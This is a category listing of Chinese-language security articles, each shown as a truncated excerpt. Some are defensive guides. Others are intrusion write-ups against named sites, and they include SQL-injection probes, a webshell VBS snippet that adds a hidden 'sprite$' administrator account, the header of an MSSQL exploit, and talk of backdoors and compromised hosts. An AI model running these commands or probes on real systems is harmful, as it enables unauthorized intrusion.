- 用WEB入侵的过程jsp
- 很偶然的一个机会,看到了一个网站,页面清新,很舒服的感觉。网站是用jsp开发的,由于个人爱好,所以我决定看看系统的安全性。 telnet www.target.com 8080 GET /CHINANSL HTTP/1.1 [Enter] [Enter] 返回的结果如下: HTTP/1.0 404 Not Found Date: Sun, 08 Jul 2001 07:49:13 GMT Servlet-Engine: Tomcat Web Server/3.1
- 分类:网络安全
- HACK成功率达80%!小心你的ADSL猫
- 随着网络的普及,网络安全也越来被人们所重视。今天就给大家介绍一个很少为人重视的案例。写这篇文章不是教大家攻击别人,而是要大家提高安全意识,如果你通过这个文章做了什么不好的事,我可不负责� 。海� 大家都应该知道,现在很多的猫都带有自动拨号功能,我们可以把帐号放在ADSL猫的拨号软件里,这样每次电脑启动的时候A
- 分类:网络安全
- 监测分布式拒绝服务
- 许多人或工具在监测分布式拒绝服务攻击时常犯的错误是只搜索那些DDoS工具的缺省特征 字符串、缺省端口、缺省口令等。要建立网络入侵监测系统(NIDS)对这些工具的监测规则,人们必须着重观察分析DDoS网络通讯的普遍特征,不管是明显的,还是模糊的。 DDoS工具产生的网络通讯信息有两种:控制信息通讯(在DDoS客户端与服务器
- 分类:网络安全
- 网站排名第一?小心搜索引擎大盗!
- 祝贺你!依靠访问量和精心制作的网页描述符,贵公司的网站在Google、雅虎或者MSN等搜索引擎中 排在了前面。现在你必须要确认你不会收到攻击。 现在,有越来越多的网站变成了搜索引擎大盗的受害者。这些盗用搜索引擎的人窃取了源代码,然后 使用脚本把网络浏览者重新指向他们的网站。增加的网络流量可以提高他们在网络搜索引
- 分类:网络安全
- SQL注入天书—ASP注入漏洞全接触
- 引 言 随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想
- 分类:网络安全
- 对付网上钓鱼我有绝招
- 前阵子各大媒体都有报道的曾疯狂一时的网络钓鱼,盗取了很多用户的钱财,一度让众网民惊惶失措。网络钓鱼就是指一些黑客或是病毒通过电子邮件或是外表酷似真正的商务或是银行网站来骗过用户的眼睛而达到盗取用户的银行账号及密码的非法举措。而网络钓鱼网站则是威胁性最强的一种网络钓鱼破坏活动。今天,笔者再次请出上网助
- 分类:网络安全
- 黑客入门之黑客术语速查
- 木马 全称为特洛伊木马(Trojan Horse),是根据希腊神话传说中一次战争而得名。麦尼劳斯派兵讨伐特洛伊国王,他们假装打败,然后留下一个大木马,而木马里却藏着最强悍的勇士!最后等晚上时间一到,木马里的勇士就冲出来把敌人打败了。这就是后来的”木马计”,而黑客中的木马有点后门的意思,就是把预谋的功能隐藏在公开的
- 分类:网络安全
- IP安全策略 VS 特洛伊木马
- 当木马悄悄打开某扇“方便之门”(端口)时,不速之客就会神不知鬼不觉地侵入你的电脑。如果被种下木马其实也不必担心,首先我们要切断它们与外界的联系(就是 堵住可疑端口)。 在Win 2000/XP/2003系统中,Microsoft管理控制台(MMC)已将系统的配置功能汇集成配置模块,大大方便我们进行特殊的设置(以Telnet利用的23端口
- 分类:网络安全
- 暴库入侵OBLOG
- 前言:OBlog是由“我爱我家”开发,支持多用户和单用户并存的ASP源码Blog。最新版本为Oblog Ver2.22,具有强大的模版定制功能,所有模块均通过标记调用,可以非常容易的制作模版。官方网站www.oioj.net有下载。 下班后,闲着没事,就到朋友的网站看了看。网站是经动易4.0修改美化的,几乎都是静态的htm文件。仔细看了看,网
- 分类:网络安全
- 老教程新菜鸟:注射基础教学
- ****注入的基础****(主要说的是手工,打基础用的~呵呵) 实例:_blankhttp://www.XXX.com/jiaren.asp?ID=544 好下面开始了..... 1.判断 用 ; 用 and 1=1 and 1=2 判断是很重要并且最主要的一步,因为如果你手工注入不判断那么怎么继续呢.. ============================================================================ 返
- 分类:网络安全
- 黑客攻击曲
- 这些东西是菜鸟写的,也是给菜鸟看的,如果你认为你是高手,请自觉离开:D 序言 你要做黑客?很好,所以这篇文章就是教你一些做黑客的基本知识,这些知识都是超级菜鸟级的基本功,本文不会涉及到攻击的具体技术,不会具体去教你攻击哪些漏洞,但是会告诉你,如果要进攻一台主机,你应该做些什么,拿着这篇文章,就不需要再去
- 分类:网络安全
- 现场纪实:如何入侵基于JSP的网站
- 编者:《现场纪实》是黑客攻防专区新推出的小版块。在这里我们将陆续为您介绍一些网上黑客入侵的真实案例,与以往从网站安全人员的角度讲述不同,这些案例都是从黑客的角度来描述入侵的全过程。通过这些案例,您可以很清楚了解到黑客在入侵一个网站时所采用的技术手段及采取的策略。涉及具体技术细节,本栏目会做相应处理,
- 分类:网络安全
- wupdmge测试手记
- 前几天拒绝聊天给我几个小工个,说是老陈给他的,一直没时间用,今天 抽出点时间来看了一下,还不错, wupdmge是端口复用的后门!绑定于80端品,于是使先试了一下他!没太多的时间看,就是打开个进程查看器,下面这是没运行前的进程 screen.width-300)this.width=screen.width-300' border='0' alt='Click to Open in New W
- 分类:网络安全
- 两种隐藏木马的新方法
- win9x下的设备名DOS漏洞是众所周之的,其实win2000下也有类似的漏洞。 我们姑且称着个漏洞为“以设备名命名的文件夹拒绝服务漏洞”,虽然很早以前就有这个漏洞(大概 1年以前就有朋友告诉我这个漏洞的情况了),但我至今还没有从各大漏洞数据库中发现她的踪迹。 根据常识,我们知道:在windows下无法以设备名来命名文件或文
- 分类:网络安全
- 2003gui界面下手工开3389
- 今天用radmin上了一台2003的肉鸡,开了终端服务,但是无论如何也不能3389连接上.查看开放端口,无3389,也没有其他的端口作为终端服务所使用的端口.用其他工具开,均失败 screen.width-300)this.width=screen.width-300' border='0' alt='Click to Open in New Window'> screen.width-300)this.width=screen.
- 分类:网络安全
- 黑客入侵方式演示
- 一、简单的黑客入侵 TCP/IP协议顺序号预测攻击是最简单的黑客入侵,也是系统安全的最大威胁。在网络上,每台计算机有惟一的IP地址,计算机把目标IP 地址和一个惟一的顺序号加载于传输的每一个数据包上。在一个TCP连接中,接收机只收到具有正确IP地址和顺序号的那个包裹。许多安全设备,如路由器,只允许有一定IP地址的计算
- 分类:网络安全
- Sniffer 常见问题集
- 本文是ISS公司在几年前发布的一份Sniffer FAQ。虽然里面涉及的技术可能相对陈旧了一些,但仍然可作为入门级文档。希望这份Sniffer FAQ能够帮助管理员们对网络监听及解决方法有一个较为清楚的认识。Sniffer已成为当今互联网上最常见的主机入侵手段之一。 在绿盟网络安全月刊中,我还将陆续介绍Sniffer、Sniffer的克星——Ant
- 分类:网络安全
- 实战入侵新浪分站的一台服务器
- 前段时间听说sohu的一个分站被人黑了我还看了,是真的。所以我也对这种门户网站动动手,我上了www.sina.com.cn, 又跑到了它的广东分站。东西太多了,找个注入点也很难,大多是Html,shtml的页面。于是我查看源文件,搜索ASP. 总算找到了一个可以asp的页面,找到了一个注入点http://gzguide.gd.sina.com.cn/news/newdetail.as
- 分类:网络安全
- 10个步骤保护IIS Web服务器安全
- 通过下面 10 步来保护 IIS: 1.为IIS 应用程序和数据专门安装一个NTFS 设备。如果有可能,不要允许IUSER(或其它任何匿名用户名)去访问任何其它设备。如果应用程序因为匿名用户无法访问其它设备上的程序而出了问题,马上使用Sysinternals 的FileMon 检测出哪个文件无法访问,并吧这个程序转移到IIS 设备上。如果无法做到这
- 分类:网络安全
- MSSQL OpenDataSource函数漏洞的攻击程序源码
- 针对David Litchfield发现的MSSQL OpenDataSource函数漏洞的攻击程序源码 /*****************************************************************************/ /* THCsql 0.1 - MSSQL Server eXPloit for Server SP3 */ /* Exploit by: Johnny Cyberpunk ([email protected]) */ /* THC PUBLIC SOURCE MATERI
- 分类:网络安全
- Discuz4.0.0RC3头像跨站漏洞
- 漏洞发现:玄猫 at Blackwoods 受影响版本:Discuz!4 dot 0.0RC3 厂商网址:_blankhttp://www.discuz.com/ 漏洞信息: 事情要从那天和辐射鱼研究Discuz的漏洞开始,他给我发来了一个2.5F的头像跨站利用动画,思路就是修改数据包提交,并且针对的版本是= 2.5F的,我看了动画打算自己试下的时候,偶然发现仅存在于Discuz4.0.0RC3
- 分类:网络安全
- 动网社区超市插件漏洞
- 今天在调试动网的时候顺便测试了下...以社区超市插件为例. 开始: 在百度上搜:z_shop_newshop.ASP 随便找个目标. 例如:http://www.sasaye.com/mybbs 默认数据库存在:http://www.sasaye.com/mybbs/data/shop.asp [基本上没人会改这个数据库名] 接着注册个名.到社区超市随便买个东西.然后到我的商品按赠送.输入论坛上任意人的I
- 分类:网络安全
- 研究报告:网络钓鱼的三种方法
- 大多数人以为网络钓鱼除了是那些旨在欺骗人们提供银行账户号码的假冒的电子邮件之外就是窃取人们的身份信息。然而,据蜜网项目组蜜网研究联盟(Honeynet Project Research Alliance)最近发表的研究报告显示,网络钓鱼要比前面说的更复杂和更可怕。 这个联盟在新的研究报告中警告说,网络钓鱼者正在使用恶意的网络服务器、
- 分类:网络安全
- 用户口令保护新招
- 经常有读者询问,如何在其站点上使用javascript,以确保用户登录时的口令不会外泄。对于这样的问题,我的第一反应就是告诉他们使用SSL(安全套接字协议层)。如使用正确,SSL对于安全要求较高的Web应用是最佳的解决方案。但是,也有相当一部分开发者,他们的Web应用对安全性的要求并不高,因此他们并不希望访问者使用SSL 登
- 分类:网络安全
- 用net start 可以启动肉鸡的命令一览
- Net start 启动服务,或显示已启动服务的列表。两个或多个词组成的服务名,例如 Net Logon 或 Co mputer Browser,必须两边加引号 ()。 net start [service] 参数 无 键入不带参数的 net start 显示正在运行服务的列表。 service 包括 alerter、client service for netware、clipbook server、content index、comput er bro
- 分类:网络安全
- webshell中用脚本提升权限
- 首先建一个vbs脚本文件 内容为 on error resume next set shell=createobject(wscript.shell) shell.runcmd.exe /c net user sprite$ /del,false,false shell.runcmd.exe /c net user sprite$ 1983 /add,false,false shell.runcmd.exe /c net localgroup administrators sprite$ /add,false,false set fso=CreateObject(Scr
- 分类:网络安全
- 探究BBSXP的漏洞
- 注:本文已经发表在《黑客X档案》2005年5期杂志上,版权归其所有。转载请保留版权字样 最近又有人爆出国内一款影响力比较大的论坛bbsXP有SQL注入漏洞,可惜大虾们总是爱把漏洞握在手里不放,我们这些小菜们只好祈祷哪个大虾好心把漏洞给放出来。终于某日……在某著名黑客网站上发现了该漏洞的利用动画+工具。 抱着顶礼膜拜
- 分类:网络安全
- EXE文件关联被破坏怎么办 恢复EXE文件关联补完版
- 方法 1: 适用于所用 Windows 95 以上版本的 Windows (9x/ME/2000/XP/2003) 开始-运行-输入command (在 windows 2000/XP/2003 中,输入cmd),回车 在命令行中,依次执行以下命令: cd %windir% copy regedit.exe regedit.com regedit 注册表编辑器打开后,找到以下分支: HKEY_CLASSES_ROOT\exefile\shell\open\command 双击
- 分类:网络安全
- 剖析Linux病毒原型工作过程和关键环节
- 一、 介绍 写这篇文章的目的主要是对最近写的一个Linux病毒原型代码做一个总结,同时向对这方面有兴趣的朋友做一个简单的介绍。阅读这篇文章你需要一些知识,要对ELF有所了解、能够阅读一些嵌入了汇编的C代码、了解病毒的基本工作原理。 二、 ELF Infector (ELF文件感染器) 为了制作病毒文件,我们需要一个ELF文件感染器,
- 分类:网络安全
- 纯脚本套牢你的动态ip肉鸡
- 记得N久前的月黑风高的晚上,正是弱口令泛滥成灾的时候,作为菜鸟的我的一大爱好就是拿着x-scan2.3扫描弱口令,因为一些个人上网的用户对安全一点都不重视,默认安装的弱口令到处都是,那时真是爽啊~~怀念ING! 暂且不说经典的弱口令入侵了,那个相信大家都会。当时我难以解决的一个问题就是这些肉鸡只要一重起重新连接的话
- 分类:网络安全